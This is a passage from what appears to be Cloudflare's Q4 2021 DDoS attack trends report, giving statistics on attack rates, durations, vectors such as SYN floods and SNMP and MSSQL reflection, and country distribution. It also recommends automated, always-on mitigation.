Larger attacks of over 1 mpps decreased by 48% to 28% QoQ, while attacks peaking below 50K pps increased by 2.36% QoQ.

DDoS Attack Trends for Q4 2021

Distribution by bit rate

Similar to the trend observed in packet-intensive attacks, the amount of bit-intensive attacks shrunk as well. While attacks over 1 Tbps are becoming the norm, with the largest one we’ve ever seen peak just below 2 Tbps, the majority of attacks are still small and peaked below 500 Mbps (97.2%).

DDoS Attack Trends for Q4 2021

In Q4 ’21, larger attacks of all ranges above 500 Mbps saw massive decreases ranging from 35% to 57% for the larger 100+ Gbps attacks.

DDoS Attack Trends for Q4 2021

Network-layer DDoS attacks by duration

Most attacks remain under one hour in duration, reiterating the need for automated always-on DDoS mitigation solutions.

We measure the duration of an attack by recording the difference between when it is first detected by our systems as an attack and the last packet we see with that attack signature towards that specific target. In the last quarter of 2021, 98% of all network-layer attacks lasted less than one hour. This is very common as most of the attacks are short-lived. Even more so, a trend we’ve seen is that when the number of attacks increases, as in this quarter, their rate and duration decreases.

DDoS Attack Trends for Q4 2021

Short attacks can easily go undetected, especially burst attacks that, within seconds, bombard a target with a significant number of packets, bytes, or requests. In this case, DDoS protection services that rely on manual mitigation by security analysis have no chance in mitigating the attack in time. They can only learn from it in their post-attack analysis, then deploy a new rule that filters the attack fingerprint and hope to catch it next time. Similarly, using an “on-demand” service, where the security team will redirect traffic to a DDoS provider during the attack, is also inefficient because the attack will already be over before the traffic routes to the on-demand DDoS provider.

It’s recommended that companies use automated, always-on DDoS protection services that analyze traffic and apply real-time fingerprinting fast enough to block short-lived attacks.

Attack vectors

SYN floods remain attackers’ favorite method of attack, while attacks over SNMP saw a massive surge of almost 5,800% QoQ.

An attack vector is a term used to describe the method that the attacker uses to launch their DDoS attack, i.e., the IP protocol, packet attributes such as TCP flags, flooding method, and other criteria.

For the first time in 2021, the percentage of SYN flood attacks significantly decreased. Throughout 2021, SYN floods accounted for 54% of all network-layer attacks on average. While still grabbing first place as the most frequent vector, its share dropped by 38% QoQ to 34%.

However, it was a close-run for SYN attacks and UDP attacks. A UDP flood is a type of denial-of-service attack in which a large number of User Datagram Protocol (UDP) packets are sent to a targeted server with the aim of overwhelming that device’s ability to process and respond. Oftentimes, the firewall protecting the targeted server can also become exhausted as a result of UDP flooding, resulting in a denial-of-service to legitimate traffic. Attacks over UDP jumped from fourth place in Q3 ’21 to second place in Q4 ’21, with a share of 32% of all network-layer attacks — a 1,198% increase in QoQ.

In third place came the SNMP underdog that made a massive leap with its first time 2021 appearance in the top attack vectors.

DDoS Attack Trends for Q4 2021

Emerging threats

When we look at emerging attack vectors — which helps us understand what new vectors attackers are deploying to launch attacks — we observe a massive spike in SNMP, MSSQL, and generic UDP-based DDoS attacks.

Both SNMP and MSSQL attacks are used to reflect and amplify traffic on the target by spoofing the target’s IP address as the source IP in the packets used to trigger the attack.

Simple Network Management Protocol (SNMP) is a UDP-based protocol that is often used to discover and manage network devices such as printers, switches, routers, and firewalls of a home or enterprise network on UDP well-known port 161. In an SNMP reflection attack, the attacker sends out a large number of SNMP queries while spoofing the source IP address in the packet as the targets to devices on the network that, in turn, reply to that target’s address. Numerous responses from the devices on the network results in the target network being DDoSed.

Similar to the SNMP amplification attack, the Microsoft SQL (MSSQL) attack is based on a technique that abuses the Microsoft SQL Server Resolution Protocol for the purpose of launching a reflection-based DDoS attack. The attack occurs when a Microsoft SQL Server responds to a client query or request, attempting to exploit the Microsoft SQL Server Resolution Protocol (MC-SQLR), listening on UDP port 1434.

DDoS Attack Trends for Q4 2021

Network-layer DDoS attacks by country

Attacks originating from Moldova quadrupled, making it the country with the highest percentage of network-layer DDoS activity.

When analyzing network-layer DDoS attacks, we bucket the traffic by the Cloudflare edge data center locations where the traffic was ingested, and not by the source IP. The reason for this is that, when attackers launch network-layer attacks, they can spoof the source IP address in order to obfuscate the attack source and introduce randomness into the attack properties, which can make it harder for simple DDoS protection systems to block the attack. Hence, if we were to derive the source country based on a spoofed source IP, we would get a spoofed country.

Cloudflare is able to overcome the challenges of spoofed IPs by displaying the attack data by the location of the Cloudflare data center in which the attack was observed. We are able to achieve geographical accuracy in our report because we have data centers in over 250 cities around the world.

DDoS Attack Trends for Q4 2021
DDoS Attack Trends for Q4 2021

To view all regions and countries, check out the interactive map.

Summary

Cloudflare’s mission is to help build a better Internet. A better Internet is one that is more secure, faster, and reliable for everyone — even in the face of DDoS attacks. As part of our mission, since 2017, we’ve been providing unmetered and unlimited DDoS protection for free to all of our customers. Over the years, it has become increasingly easier for attackers to launch DDoS attacks. To counter the attacker’s advantage, we want to make sure that it is also easy and free for organizations of all sizes to protect themselves against DDoS attacks of all types.

Not using Cloudflare yet? Start now.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close